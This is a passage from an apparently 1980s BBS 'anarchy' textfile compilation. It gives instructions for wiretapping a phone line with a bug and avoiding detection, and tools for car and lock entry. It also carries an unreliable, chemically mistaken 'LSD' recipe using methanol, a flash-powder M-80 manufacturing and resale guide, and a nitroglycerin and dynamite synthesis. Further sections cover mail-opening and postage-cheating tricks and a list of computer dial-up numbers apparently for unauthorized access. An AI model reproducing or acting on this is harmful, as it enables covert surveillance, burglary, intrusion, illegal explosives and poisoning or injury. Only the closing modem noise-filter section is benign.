  2863. for eavesdropping unless authorized by all parties of the conversation" (then
  2864. it's not eavesdropping is it?). What this thing does, is use four diodes to
  2865. form a "bridge rectifier". It produces a varying dc voltage varying with the
  2866. auto-signals on the line. That voltage is used to supply the the voltage for
  2867. the oscillator transistor. Which is connected to a radio circuit. From there,
  2868. you can tune it to any channel you want. The rest will all be explained in a
  2869. minute....
  2870.  
  2871.  
  2872.  
  2873.  
  2874.   _7+3 _PARTS LIST
  2875. item                              description
  2876. -----------------------------------------------------------------
  2877. C1                   47-Pf ceramic disk capacitor
  2878. C2,C3                27-Pf mica capacitor
  2879. CR1,CR2,CR3,CR4      germanium diode 1n90 or equivalent
  2880. R1                   100 ohm, 1/4 watt 10% composition resistor
  2881. R2                   10k, 1/4 watt 10% composition resistor
  2882. R3                   .7k, 1/4 watt 10% composition resistor
  2883. L1                   2 uH radio frequency choke (see text)
  2884. L2                   5 turns No.20 wire (see text)
  2885. Q1                   Npn rf transistor 2N5179 or equivalent
  2886. -----------------------------------------------------------------
  2887.  
  2888. L1 may be constructed by winding approximately 40 turns of No. 36
  2889. enamel wire on a mega-ohm, 1/2 watt resistor. The value of L1 is
  2890. not critical. L2 can be made by wrapping 5 turns of No. 20 wire
  2891. around a 1/4 inch form. After the wire is wrapped, the form can
  2892. be removed. Just solder it into place on the circuit board. It
  2893. should hold quite nicely. Also be sure to position Q1 so that the
  2894. emitter, base, and collector are in the proper holes. The
  2895. schematic should be pretty easy to follow. Although it has an
  2896. unusual number of grounds, it still works.
  2897.  
  2898.  
  2899.  
  2900.  
  2901.           ------------------L1----------------
  2902.          --
  2903.         CR1 /  \ CR2              ----------------
  2904. A--------------/    \ --         ----
  2905.           \    /                         C2    L2
  2906.        CR3 \  /CR4          C1  R2    ----
  2907.       R1         --                     gnd   C3
  2908.                    ----          -----
  2909.            gnd
  2910.                     ---------Base  collector
  2911.                       R3     \   /
  2912. B-----------------------                          \/\ <- Q1
  2913.                        gnd       \/
  2914.  
  2915.  
  2916.                             emitter(gnd)
  2917.  
  2918.  
  2919.  
  2920. The odd thing about this bug that we haven't encountered yet, is that it is put
  2921. on only one wire (either red or green) so go to the box, remove the red wire
  2922. that was ALREADY on screw #1 and attach it to wire 'A' of the bug. Then attach
  2923. wire 'B' to the screw itself. You can adjust the frequency which it comes out
  2924. on the FM channel by either smooshing, or widening the coils of L2. It takes a
  2925. few minutes to get to work right, but it is also very versatile. You can change
  2926. the frequency at will, and you can easily record off your radio.
  2927.  
  2928.                PART FIVE: HELPFUL HINTS  _7+3 _
  2929.  
  2930. First of all, With method one, the beige box, you may notice that you can also
  2931. dial out on the phone you use. I don't recommend that you do this. If you
  2932. decide to anyway, and do something conspicuous like set up a 30 person
  2933. conference for three hours, then I suggest that you make sure the people are
  2934. either out of town or dead. In general, when you tap a line, you must be
  2935. careful. I test everything I make on my line first, then install it late at
  2936. night. I would not recommend that you leave a recorder on all day. Put it on
  2937. when you want it going, and take it off when you're done. As far as recording
  2938. goes, I think that if there is a recorder on the line it sends a sporadic beep
  2939. back to the phone co. I know that if you don't record directly off the line
  2940. (i.e off your radio) then even the most sophisticated equipment can't tell that
  2941. you're recording. Also, make sure that when you install something, the people
  2942. are NOT on the line. Installation tends to make lots of scratchy sounds, clicks
  2943. and static. It is generally a good thing to avoid. It doesn't take too much
  2944. intelligence to just make a call to the house before you go to install the
  2945. thing. If it's busy then wait a while. (This of course does not apply if you
  2946. are making a "midnight run").
  2947.  
  2948. All in all, if you use common sense, and are *VERY* careful, chances are you
  2949. won't get caught. Never think that you're unstoppable, and don't broadcast what
  2950. you're doing. Keep it to yourself, and you can have a great time.
  2951.  
  2952.  
  2953.  
  2954.  
  2955.                  Miracle Lock Picking
  2956.  
  2957.      While the basic themes of lockpicking and uninvited entry have not
  2958. changed too much in the last few years, some modern devices and techniques
  2959. HAVE appeared on the scene...
  2960.  
  2961. AUTOS
  2962.      Many older autos can still be opened by easily with a SLIM JIM type
  2963. opener (these and other auto locksmithing techniques are covered fully in the
  2964. book, IN THE STEAL OF THE NIGHT.  Look for it at the next gun-show in your
  2965. town.); however, many modern cars have built covers over the lock mechanism,
  2966. or have moved the goodies so the Slim Jim will not function...
  2967.  
  2968. So...
  2969.  
  2970. AMERICAN LOCKSMITH SERVICE
  2971. P.O. Box 26
  2972. Culver City, CA 90230
  2973.  
  2974. Carries a new and improved Slim Jim that is 30" long and only 3/4" wide so it
  2975. will both reach and slip through the new car lock covers.  Price is $5.75 plus
  2976. $2.00 postage and handling.
  2977.     General Motors cars have always been a bane to people who needed to open
  2978. them, because the sidebar locking unit they employ is very difficult to pick.
  2979. To further complicate matters, the new GM cars do employ metal shields to make
  2980. the use of a Slim Jim type instrument very difficult...
  2981.  
  2982. So...  _7+3 _
  2983. LOCK TECHNOLOGY CORP.
  2984. 685 Main St.
  2985. New Rochelle, NY 10801
  2986.  
  2987. Offers a cute little gizmo which will easily remove the lock cylinder without
  2988. harm and let you enter and/or start the vehicle.  GMC-40 sells for $56.00 plus
  2989. $2.00 postage and handling.  The best general automobile opening kit is
  2990. probably the set of lockout tools offered by:
  2991.  
  2992. STECK MFG COPR.
  2993. 1319 W Stewart St.
  2994. Dayton, OH 45408
  2995.  
  2996. For $29.95 one can purchase a complete set of 6 carbon steel lockout tools
  2997. that will open 95%+ of the cars around.
  2998.  
  2999.      Kwikset locks have become quite popular as one-step-up security locks for
  3000. buildings.  They are a bit harder to pick and do offer a higher degree of
  3001. privacy than a normal, builder installed, door lock.
  3002.  
  3003. So...
  3004.  
  3005. Kwikset locks can be handily disassembled and the door opened, without harm to
  3006. either the lock or the door, by using a KIWK-OUT tool sold by:
  3007.  
  3008. A MFG
  3009. 1151 Wallace SE
  3010. Massilon, OH 44646
  3011.  
  3012. Price is $11.95, but if you are too lazy to pick auto locks...
  3013.  
  3014. VEEHOF SUPPLY
  3015. Box 361
  3016. Storm Lake, IO 50588
  3017.  
  3018. Still sells tryout keys for most cars.  Price averages about $20.00 a set.
  3019.  
  3020.  
  3021. Updated Lock Picking:
  3022.  
  3023.      For years, there have been a number of pick attack procedures for most
  3024. pin and disc tumbler lock systems.  In reverse order of ease they are:
  3025.  
  3026. Normal picking:  Using a pick set to align the pins, one by one, until the
  3027. shear line is set and lock opens.
  3028.  
  3029. Raking:  This method uses picks that are constructed wth a series of bumps, or
  3030. diamond shaped notches.  these picks are "raked", i.e., run over all pins at
  3031. one time.  With luck, the pins will raise into the open position and stay
  3032. there.  Raking, if successful, can be much less effort than standard picking
  3033. is.
  3034.  
  3035. Lock Aid Gun:  This gun shaped device was invented a number of years ago and
  3036. has found applicatin with many locksmiths and security personnel.  Basically,  _7+3 _a needle shaped pick is inserted in the snout of the "gun" and the "trigger"
  3037. is pulled.  This action snaps the pick up and down strongly.  If the tip is
  3038. slipped under the pins, they will also be snapped up and down strongly.  With
  3039. a bit of luck, they will strike each other and separate at the shear line for
  3040. a split second.  When this happens the lock will open.  The Lock Aid gun is
  3041. not 100% successful, but when it does work, the results are quite dramatic.  I
  3042. have opened locks with one snap of the trigger, impressing the hell out of
  3043. casual bystanders....
  3044.  
  3045. Vibrator:  Some crafty people have mounted a needle pick onto an electric
  3046. toothbrush power unit.  This vibrating effect will sometimes open pin tumbler
  3047. locks;  like instantly...
  3048.  
  3049.  
  3050. Technology to the rescue!
  3051.  
  3052.      There is now another method to open pin and wafer locks in a very short
  3053. time.  Although it resembles the toothbrush pick in appearance, it is actually
  3054. and electronic device.  I am speaking of the COBRA PICK.  Designed and sold
  3055. by:
  3056.  
  3057. FEDCORP
  3058. P.O. Box 569
  3059. Scottsdale, AZ 85252
  3060.  
  3061. The Cobra uses two 9-volt batteries, teflon bearings (for less noise) and a
  3062. cam-roller.  It comes with three picks (for different types of locks) and
  3063. works both in America and overseas on pin or wafer locks.  It will open common
  3064. door type locks in 3 to 7 seconds with no damage (in the hands of an
  3065. experienced locksmith).  It can take a few seconds more, or even half a minute
  3066. in the hands of someone with no experience.  How much for this toy that will
  3067. open most locks in 7 seconds?
  3068.  
  3069. $235 plus $4.50 handling.
  3070.  
  3071.  
  3072.     If none of these cute, safe and sane ideas appeal to you, you can always
  3073. fall back on the magic thermal lance...
  3074.  
  3075.  
  3076.     The thermal lance is a rather crude instrument constructed from 3/8"
  3077. hollow magnesium rods.  Each "tube" comes in a 10" length, but can be cut down
  3078. if desired.  Each one is threaded on one end.  To use the lance, you screw the
  3079. tube together with a mated regulator (like a welding outfit uses) and hook up
  3080. an oxygen tank.  the oxygen is turned on and the hollwo rod is lit with a
  3081. welding igniter.  The device produces an incredible amount of heat.  It is
  3082. used for cutting up concrete blocks or even rocks.  An active lance will go
  3083. through a foot of steel in a few seconds.
  3084.  
  3085. The lance, also known as a burning bar, is available from:
  3086.  
  3087. C.O.L. MFG
  3088. 7748 W Addison
  3089. Chicago, IL 60634
  3090.   _7+3 _
  3091.                  ====================
  3092.                  =    MAKING LSD    =
  3093.                  ====================
  3094. LSD, being of the strangest drugs, is available to people on the black
  3095. market, is not too hard to make in your average run-of-the-mill kitchen.
  3096. LSD (LySergic acid Diethylamide) is a complex organic mixture that gives
  3097. some people (most)
  3098. ================================
  3099. Making LSD: ITEMS NEEDED:
  3100.   1-About 200-250 grams of MORNIGLOR SEEDS or BAY HAWAIIAN OOD ROSE SEEDS.
  3101.    The Morning Glory Seeds can be obtained at most plant nurseries.
  3102.   2-200 cc. of petroleum ether
  3103.   3-Small piece of window screen or a strainer.
  3104.   4-A couple of large glasses.
  3105.   5-One cookie try (old on to never be used again).
  3106.   6-260 cc. of wood alcohol (call your local drug store).
  3107.   7-Capsule containers (jel)
  3108. ================================
  3109. Lets get started:
  3110.   1.  Grind up about 170 grams of Morning Glory Seeds.
  3111.   2.  In 145 cc of petroleum ether, soak the seeds for two or three days.
  3112.   3.  With screen, filter the liquid thru it and save the seed mush and allow
  3113.    it to dry completely.
  3114.   4.  Let the mush soak in 130 cc. of wood alcohol.
  3115.   5.  Filter solution again only.  Save the liquid in a large glass jar.
  3116.   6.  Soak the seed mush again in 130 cc. of wood alcohol for two more days.
  3117.   7.  Filter out the mush and keep the liquid.  Now, get the liquid that was
  3118.    saved in step 5.
  3119.   8.  Now, pour both liquids in a cookie tray and let it dry.
  3120.   9.  When all the liquid has dried, a yellowish gummy looking substance will
  3121.    appear on the cookie sheet.
  3122.   10. Take the yellow gum and put these in to capsules.
  3123. ================================
  3124. You can get the capsules just by buying something like DEXITREM or some other
  3125. pill.  Even CONTACT comes in jel capsules.  Just empty them out and
  3126. put the yellow gum in the capsules.  Allow the capsules to sit over night
  3127. for best results.
  3128.  
  3129. 1 Trip:
  3130.   34 Grams of morning glory
  3131.   18 Grams of hawaiian wood
  3132. ================================
  3133.  
  3134.  
  3135.                How to open your own M-80 Factory
  3136.  
  3137.  
  3138.                   **********
  3139.                   *Supplies*
  3140.                   **********
  3141.  
  3142. Chicago Paper Tube. Phone # 1-312-666-1404. You will be getting the paper
  3143. tubes from here. Order tubes that are 1/2" in diameter by 1 1/2" long with a
  3144. 1/16" wall with RED outer wrap.  _7+3 _
  3145. Paper Products. 1310 5th St., Tempe, AZ. 85281. Order 1/2" diameter paper end
  3146. plugs. Write to them for prices. REMEMBER:  for every 100 paper tubes you
  3147. order, you must order 200 paper end plugs.
  3148.  
  3149. Midwest Fireworks. 8550 RT. 224,Deerfield,OH. 44411.  Phone 1-800-321-2400.
  3150. Order one roll of 1/8" water proof fuse. Each M-80 needs a 2" fuse, so for
  3151. every 100 paper tubes you order, you should have 17' of water proof fuse.
  3152.  
  3153. Barium Chemicals Inc.,P.O. Box 218,County Rd. 44, Steubenville, OH. 43952.
  3154. Phone 1-614-282-9776.  Order Potassium Perchlorate. Order 2 pounds for every
  3155. 250 paper tubes you order.
  3156.  
  3157. Alcan Metal Powder Div.,P.O. Box 290, Elizabeth,NJ 07207. Phone 1-201-353-
  3158. 4600.  Order #AL-105 Aluminum Powder. Order 1 pound for every 250 paper tubes
  3159. you order.
  3160.  
  3161. Buy 1 gallon of Elmers glue from a hardware store or lumber yard.
  3162.  
  3163.                   **********
  3164.                   *Assembly*
  3165.                   **********
  3166.  
  3167. 1.  Put 1 drop of glue on the inside of one end of the tube and insert the
  3168. paper end plug.
  3169.  
  3170. 2.  Punch or drill a 1/8" hole in the side of the paper tube.
  3171.  
  3172. 3.  Cut the fuse you purchased into 2" long pieces.
  3173.  
  3174. 4.  Insert the fuse into the hole in the paper tube and glue in place.
  3175.  
  3176. 5.  Scoop the paper tube with the fuse into a container of flash powder. The
  3177. paper tube should be about 2/3 full.
  3178.  
  3179. 6.  Put glue on the end plug and insert it into the paper tube filled with
  3180. flash powder.
  3181.  
  3182. 7.  The completed M-80 firecracker should dry and the glue will become hard in
  3183. 30-45 minutes.
  3184.  
  3185.                 **********************
  3186.                 *Flash Powder Formula*
  3187.                 **********************
  3188.  
  3189. Sensitive to friction and impact. High Explosive!
  3190.  
  3191. Potassium Perchlorate     2 lbs.
  3192. Aluminum Powder           1 lb.
  3193.  
  3194. There must be a 2 to 1 ratio of Potassium Perchlorate to Aluminum Powder in
  3195. order for the flash powder to be good. It must also be mixed well.
  3196.  
  3197. Suggested Price for the M-80's
  3198. You can make up your own price,but here are some prices.  _7+3 _
  3199. 2 for $1.00   11 for $5.00   24 for $10.00   50 for $20.00   100 for $40.00
  3200.  
  3201.  
  3202.  
  3203.  
  3204.                   ============
  3205.                   MAIL SECRETS
  3206.                   ============
  3207.  
  3208.   There is a little secret coding or gimmickry on U.S. mail.  All U.S. postage
  3209. stamps have an invisible ink coding that flouresces in ultraviolet light.
  3210. Partly this is to detere counterfeiting of stamps.  Mostly, it is to speed up
  3211. sorting.  Canceling machines shine an ultraviolet beam on letters and check for
  3212. a glow.  Calcium silicate (which glows orange-red) and zinc orthosilicate
  3213. (which glows yellow-green) are used.  They are printed over the entire surface
  3214. of stamps or in a geometric pattern.
  3215.  
  3216.   Personal letters to the U.S. President have a secret numerical code.  The
  3217. president often gets 10,000 letters a day.  Virtually all must be opened, read,
  3218. and answered by the White House mail staff.  So that letters from friends get
  3219. to the president and family unopened, all close friends are given a sequence of
  3220. numbers to write on the outside of the envelope.  The code changes with each
  3221. president.  Ronald Reagan's code was described as a number with a special
  3222. meaning to Reagan and his wife.  Jimmy Carter used an old phone number of
  3223. Rosalynn's.
  3224.  
  3225. ---------
  3226. WAX SEALS
  3227. ---------
  3228.  
  3229.   Wax seals are not a guarantee against unauthorized opening of a letter.
  3230. According to the CIA Flaps and Seals Manual, edited by John M. Harrison
  3231. (Boulder, Colo.:  Paladin Press, 1975), there is a way to remove and replace
  3232. seals.
  3233.  
  3234.   First the opener takes a plaster-of-paris cast of the seal.  This is set
  3235. aside to harden.  The wax is gently heated with an infrared lamp.  When soft,
  3236. it is rolled into a ball and set aside.  The flap of the envelope is steamed
  3237. open, and the letter is taken outand photocopied.
  3238.  
  3239.   After the envelope's contents and replaced and the flap resealed, the same
  3240. wax is used to re-create the seal.  It is heated till pliable and pressed back
  3241. into shape with the plaster-of-paris mold.
  3242.  
  3243.   One type of seal is secure, even according to CIA Flaps And Seals Manual:
  3244. one made of two or more colors of wax melted together.  The colors inevitably
  3245. come out different on the second, surreptitious pressing.  But a color Polaroid
  3246. of the seal must be sent under seperate cover so that the letter's recipient
  3247. can compare it wiht the seal on the message letter.
  3248.  
  3249.   None of the common seals are reliable against unauthorized opening, assuming
  3250. that knowledgeable letter-openers may want to open your mail.  Scoth tape
  3251. across the flap of an envelpoe come of cleany with carbon tetrachloride
  3252. (applied with a brush or a hypodermic needle).  If you suspect that someone is  _7+3 _opening your mail, the manual suggests sending yourself a letter containing a
  3253. sheet of carbon or wax paper.  The heat and mechanical treatment of the letter
  3254. opening will smudge the carbon and melt the wax.  Otherwise, you have to
  3255. examine letters carefully to detect prior opening.  A torn flap, smudging of
  3256. the flap glue, flattened ridges in the flap, or concave (from the back) curling
  3257. due to steaming are evidence of opening.
  3258.  
  3259.   A more sophisticated test requires steaming part of the envelope near the
  3260. flap for fifteen seconds.  Then place the envelope under an ultraviolet lamp.
  3261. If there is a difference in flourescence between the steamed and the unsteamed
  3262. part of the envelope, then the envelope paper is suitable for the test.  If so,
  3263. examine the unsteamed part of the flap under the ultraviolet lamp.  If it shows
  3264. a different flourescence than the other unsteamed parts of the envelope, it
  3265. indicates that the flap may have been previously steamed.
  3266.  
  3267.   The ultraviolet lamp is also useful in detecting invisible writing.  An
  3268. effective ultraviolet ink need not flouresce brightly, as the silicate stamps
  3269. inks do.  Any substance that changes the flourescence of paper in ultraviolet
  3270. light yet is invisible in ordinary light will work.  Prisoners have used human
  3271. urine as an invisible ink (not hard to get, ehh?).  Salt water, vinegar, milk,
  3272. fruit juices, saliva, and water solutions of soap or drugs also work, with
  3273. varying degrees of legibility.
  3274.  
  3275.  
  3276. ---------------------------
  3277. HOW TO MAIL WITHOUT A STAMP
  3278. ---------------------------
  3279.  
  3280.   Postal chiselers used to mail letters unstamped in the knowledge that they
  3281. would be delievered anyway--postage due to the recipient.  It took a niggardly
  3282. person to mail personal letters this way, but many people did it on bill
  3283. payments.  So the post office changed its policy.  It stopped delivering
  3284. letters without stamps.  A letter with a stamp--even a one-cent stamp--is
  3285. delivered (postage due if need be).  A letter with no stamp is returned to the
  3286. sender.
  3287.  
  3288.   Naturally, this had just opened up a new way of cheating.  Letters can now be
  3289. maileed for free by switching the positions of the delivery address and the
  3290. return address.  If there is no stamp on the envelope, it will be "returned"--
  3291. that is, delivered to the address in the upper left corner--which is where the
  3292. sender wanted it to go in the first place.  Unlike under the old system, the
  3293. letter is not postage-due.  At most the recipient gets a stamped purple
  3294. reminder that "the post office does not deliver mail without postage."
  3295.  
  3296.   At least one large company seems to have adapted this principle to its
  3297. billing.  Citibank bases its MasterCard operations in Sioux Falls, South
  3298. Dakota.  The bill payment envelopes have the Citibank Sioux Falls address in
  3299. both the delivery address and the return address positions.  (Most bill payment
  3300. envelopes have three lines for the customer to write in his return address.)
  3301. Therefore, regardless of whether the customer puts a stamp on the envelope, it
  3302. is delivered to Citibank.  (The return-address gimmick works even when the
  3303. return address is in a different state from the mailing point.)
  3304.  
  3305.   Who is cheating whom?  If the customer puts the correct postage on the
  3306. envelope, it is delivered to Sioux Falls at customer expense.  No one is  _7+3 _slighted.  If, on the other hand, the customer intentionally omits the stamp,
  3307. the payment is delivered at the post office expense.  Then the customer has
  3308. cheated the post office.  The post office also loses out if the customer
  3309. honestly forgets to put a stamp on the envelope.  But the blame ought to be
  3310. shared with the peculiar design of Citibank's envelope.
  3311.  
  3312.   Citibank's motive is plain:  If payment envelopes are returned to forgetful
  3313. customers, it delays payment.
  3314.  
  3315.  
  3316.  
  3317.  
  3318.              **** MAINFRAMES & MISC. ****
  3319.  
  3320.  
  3321.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3322. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3323. RATHER A SMALLER TYPE SYSTEM.
  3324.  
  3325. 312-972-7603   ARROGON NET LAB
  3326. 800-228-1111   AMERICAN EXPRESS
  3327. 215-564-6572   ATLANTIC CITY CASINO
  3328. 800-225-8456   AUTONET
  3329. 800-327-676
  3330. 313-234-5621   FTS
  3331. 213-798-2000   FTS
  3332. 202-347-3222   F.A.A.
  3333. 817-332-8491   FORTWORTH SCHOOL
  3334. 817-625-6401   GIS
  3335. 617-732-1251   HARVARD
  3336. 617-732-1802   "
  3337. 415-857-8193   HP3000
  3338. 303-232-8555   HP3000
  3339. 313-644-3840   HIGH SCHOOL
  3340. 714-962-3365   H.A.T.S.
  3341. 215-563-9213   HP3000
  3342. 512-385-4170   HP3000
  3343. 301-881-6156   HP3000
  3344. 301-881-6157   HP3000
  3345. 301-881-6158   HP3000SION
  3346. 609-734-3131   RCA/CMS
  3347. 414-476-8010   RSTS/E
  3348. 414-542-4494   "
  3349. 414-543-0789   "
  3350. 303-447-2540   "
  3351. 817-877-0548   "
  3352. 313-964-2064   SMITH & HENCHMAN
  3353. 315-423-1313   SYRACUSE DECS
  3354. 404-885-3460   SEARS CREDIT CHECK
  3355. 212-369-5114   SPENCE SCHOOL
  3356. 713-795-1200   SHELL VULCAN
  3357. 313-964-2000   SEMAT COMPUTER
  3358. 412-794-7601   SLIPPERY ROCK OIL
  3359. 800-424-9494   TELEMAIL
  3360. 714-776-4511   TRW  _7+3 _
  3361.  
  3362.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3363. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3364. RATHER A SMALLER TYPE SYSTEM.
  3365.  
  3366. 312-972-7603   ARROGON NET LAB
  3367. 800-228-1111   AMERICAN EXPRESS
  3368. 215-564-6572   ATLANTIC CITY CASINO
  3369. 800-225-8456   AUTONET
  3370. 800-327-676
  3371. 313-234-5621   FTS
  3372. 213-798-2000   FTS
  3373. 202-347-3222   F.A.A.
  3374. 817-332-8491   FORTWORTH SCHOOL
  3375. 817-625-6401   GIS
  3376. 617-732-1251   HARVARD
  3377. 617-732-1802   "
  3378. 415-857-8193   HP3000
  3379. 303-232-8555   HP3000
  3380. 313-644-3840   HIGH SCHOOL
  3381. 714-962-3365   H.A.T.S.
  3382. 215-563-9213   HP3000
  3383. 512-385-4170   HP3000
  3384. 301-881-6156   HP3000
  3385. 301-881-6157   HP3000
  3386. 301-881-6158   HP3000SION
  3387. 609-734-3131   RCA/CMS
  3388. 414-476-8010   RSTS/E
  3389. 414-542-4494   "
  3390. 414-543-0789   "
  3391. 303-447-2540   "
  3392. 817-877-0548   "
  3393. 313-964-2064   SMITH & HENCHMAN
  3394. 315-423-1313   SYRACUSE DECS
  3395. 404-885-3460   SEARS CREDIT CHECK
  3396. 212-369-5114   SPENCE SCHOOL
  3397. 713-795-1200   SHELL VULCAN
  3398. 313-964-2000   SEMAT COMPUTER
  3399. 412-794-7601   SLIPPERY ROCK OIL
  3400. 800-424-9494   TELEMAIL
  3401. 714-776-4511   TRW
  3402.  
  3403.  
  3404.  
  3405.                How to Make Nitroglycerin
  3406.  
  3407.             CH2ONO2
  3408.             !
  3409.   3/2 N2 + 3 CO2
  3410.             CHONO2  ---------->
  3411.      +
  3412.             !        Ignition
  3413.   5/2 H2O + 1/4 O2
  3414.             CH2ONO2  _7+3 _
  3415. (How Nitro explodes--note that the byproducts are nothing but nitrogen, carbon
  3416. dioxide, water and oxygen)
  3417.  
  3418.      Nitroglycerin [heretofore Nitro] is a very high-explosive. I am not sure
  3419. who invented it but he porbably didn't-- the first preson to make it blew
  3420. himself up and his friend got the info off his notes. Well anyway, the next
  3421. best thing to nitro is TNT which is ten times harder to make but also ten
  3422. times safer to make. If you can't use common sense then don't even try to make
  3423. this stuff-- a few drops can be lethal under certain circumstances.
  3424.  
  3425.                 To make Nitro:
  3426.                 --------------
  3427.  
  3428.      Mix 100 parts fuming nitric acid(for best results it should have a
  3429. specific gravity of 50 degrees Baume') with 200 parts sulphuric acid. This is
  3430. going to be hot at first--it won't splatter if you pour the nitric into the
  3431. sulphuric but don't try it the other way around. The acid solutions together
  3432. can dissolve flesh in a matter of seconds so take the proper measures for
  3433. God's sake!!! When cool, add 38 parts glycerine as slowly as possible. Let it
  3434. trickle down the sides of the container into the acids or it won't mix
  3435. thourily and the reaction could go fast--which causes heat to ignite the
  3436. stuff. Stir with a **GLASS** rod for about 15 seconds or so then **CAREFULLY**
  3437. pour it into 20 times it's **VOLUME** of water. It will visibly precipate
  3438. immediatly. There will be twice as much Nitro as you used glycerin and it is
  3439. easy to seperate. Mix it with baking soda as soon as you have seperated it--
  3440. this helps it not to go off spontainously.
  3441.  
  3442. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3443.   NOTES:  Parts are by weight and the Baume' scale of specific gravity can be
  3444. found in most chem. books. You can get fuming nitric and sulfuric acid where
  3445. ever goo chemical or fertilizers are sold. It is positivly *STUPID* to make
  3446. more than 200 grams of Nitro at a time. When mixing the stuff wear goggles,
  3447. gloves, etc. When I first made the stuff I had the honor of having it go off
  3448. by itself (I added too much glycerin at a time). I was across the room at the
  3449. time, but I felt the impact-- so did the table it was on as well as the window
  3450. it was next to--they were both smashed by only 25 grams in an open bowl. Oh
  3451. yes, glycerine you can get at any pharmacy and you need an adults sigature for
  3452. the acids. Any bump can make Nitro go off if you don't add the bicarbonate of
  3453. (baking) soda-but even with that, if it gets old I wouldn't play catch with
  3454. it.
  3455.      Once you have made the Nitro and saturated it with bicarb. you can make a
  3456. really powerful explosive that won't go off by itself by simply mixing it with
  3457. as much cotton as you can add and then saturating it that with molten
  3458. parifine--just enough to make it sealed and hard. Typically use the same
  3459. amounts (by weight) of each Nitro, cotton, and parifine. This when wrapped in
  3460. newspaper, was once known as "Norbin & Ohlsson's Patent Dynamite," but that
  3461. was back in 1896.
  3462.  
  3463.  
  3464.  
  3465.  
  3466.  
  3467.  
  3468.   _7+3 _Modem Noise Killer (alpha version)
  3469.  
  3470. With this circuit diagram, some basic tools including a soldering iron, and
  3471. four or five components from Radio Shack, you should be able to cut the
  3472. noise/garbage that appears on your computer's screen.
  3473.  
  3474. I started this project out of frustration at using a US Robotics 2400 baud
  3475. modem and getting a fare amount of junk when connecting at that speed. Knowing
  3476. that capacitors make good noise filters, I threw this together.
  3477.  
  3478. This is very easy to build, however conditions may be different due to modem
  3479. type, amount of line noise, old or new switching equipment (Bell's equipment),
  3480. and on and on. So it may not work as well for you in every case. If it does
  3481. work, or if you've managed to tweek it to your computer/modem setup I' d like
  3482. to hear from you.
  3483.  
  3484. I'd also appreciate any of you electronic wizzards out there wanting to offer
  3485. any improvements. Let's make this work for everyone!
  3486.  
  3487. Please read this entire message and see if you understand it before you begin.
  3488.  
  3489. OK, what you' ll need from Radio Shack:
  3490.  
  3491. 1 #279-374 Modular line cord if you don't already have one. You won't need one
  3492. if your phone has a modular plug in its base. $4.95
  3493.  
  3494. 1 #279-420 Modular surface mount jack (4 or 6 conductor) $4.49
  3495.  
  3496. 1 #271-1720 Potentiometer. This is a 5k audio taper variable resistor. $1.09
  3497.  
  3498. 1 #272-1055 Capacitor. Any non-polarized 1.0 to 1.5 uf cap should do. Paper,
  3499. Mylar, or metal film caps should be used, although #272-996 may work as well.
  3500. (272-996 is a non-polarized electrolytic cap) $.79
  3501.  
  3502. 1 100 ohm resistor - quarter or half watt. $.19
  3503.  
  3504. 1 #279-357 Y-type or duplex modular connector. Don't buy this until you've read
  3505. the section on connecting the Noise Killer below. (A, B,or C) $4.95
  3506.  
  3507. First off, open the modular block. You normally just pry them open with a
  3508. screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but
  3509. the green and red wires. The ones you'll be removing should be black, yellow,
  3510. white, and blue. These wires won't be needed and may be in the way. So cut them
  3511. as close to where they enter the plug as possible. The other end of these wires
  3512. have a spade lug connector that is screwed into the plastic. Unscrew and remove
  3513. that end of the wires as well. Now, you should have two wires left. Green and
  3514. red. Solder one end of the capacitor to the green wire. Solder the other end of
  3515. the capacitor to the center lug of the potentiometer (there are three lugs on
  3516. this critter). Solder one end of the resistor to the red wire. You may want to
  3517. shorten the leads of the resistor first. Solder the other end of the resistor
  3518. to either one of the remaining outside lugs of the potentiometer. Doesn't
  3519. matter which. Now to wrap it up, make a hole in the lid of the mod block to
  3520. stick the shaft of the potentiometer through. Don't make this hole dead center
  3521. as the other parts may not fit into the body of the mod block if you do. See
  3522. how things will fit in order to find where the hole will go. Well, now that  _7+3 _you've got it built you'll need to test it. First twist the shaft on the
  3523. potentiometer until it stops. You won't know which way to turn it until later.
  3524. It doesn't matter which way now. You also need to determine where to plug the
  3525. Noise Killer onto the telephone line. It can be done by one of several ways:
  3526.  
  3527. A. If your modem has two modular plugs in back, connect the Noise Killer into
  3528. one of them using a line cord. (a line cord is a straight cord that connects a
  3529. phone to the wall outlet. Usually silver in color)
  3530.  
  3531. B. If your phone is modular, you can unplug the cord from the back of it after
  3532. you're on-line and plug the cord into the Noise Killer.
  3533.  
  3534. C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall
  3535. outlet, plug the modem into one side and the Noise Killer into the other. Call
  3536. a BBS that has known noise problems. After you've connected and garbage begins
  3537. to appear, plug the Noise Killer into the phone line as described above. If you
  3538. have turned the shaft on the potentiometer the wrong way you'll find out now.
  3539. You may get a lot of garbage or even disconnected. If this happens, turn the
  3540. shaft the other way until it stops and try again. If you don't notice much
  3541. difference when you plug the Noise Killer in, that may be a good sign. Type in
  3542. a few commands and look for garbage characters on the screen. If there still
  3543. is, turn the shaft slowly until most of it is gone. If nothing seems to happen
  3544. at all, turn the shaft slowly from one side to the other. You should get plenty
  3545. of garbage or disconnected at some point. If you don't, reread this message to
  3546. make sure you've connected it right.
  3547.  
  3548.  
  3549. ***END OF ORIGNAL FILE***
  3550.  
  3551. ADDITION TO ORIGNAL FILE - 2/29/88 - Mike McCauley - CIS 71505,1173
  3552.  
  3553. First, a personal recomendation. _THIS WORKS!!!_  I have been plagued with
  3554. noise at 2400 for some time. I went round and round with Ma Bell on it, and
  3555. after they sent out several "repair persons" who were, to be kind, of limited
  3556. help in the matter, I threw in the towel. I saw this file on a board up east
  3557. a few days ago, and thought I'd bite. Threw the gismo together in about 10
  3558. minutes, took another five to adjust the pot for best results on my worst
  3559. conection, and guess what? No more worst connecion! A few pointers:
  3560.  
  3561. 1) The pot need not be either 5K or audio taper. I used a 10K 15 turn trim pot.
  3562.    Suggest you use what is handy.
  3563. 2) I used 2MFD's of capacitance (two 1MFD's in parallel) Two R.S. p/n 272-1055
  3564.    work fine. Remember that about 90 Volts will appear across red & green at
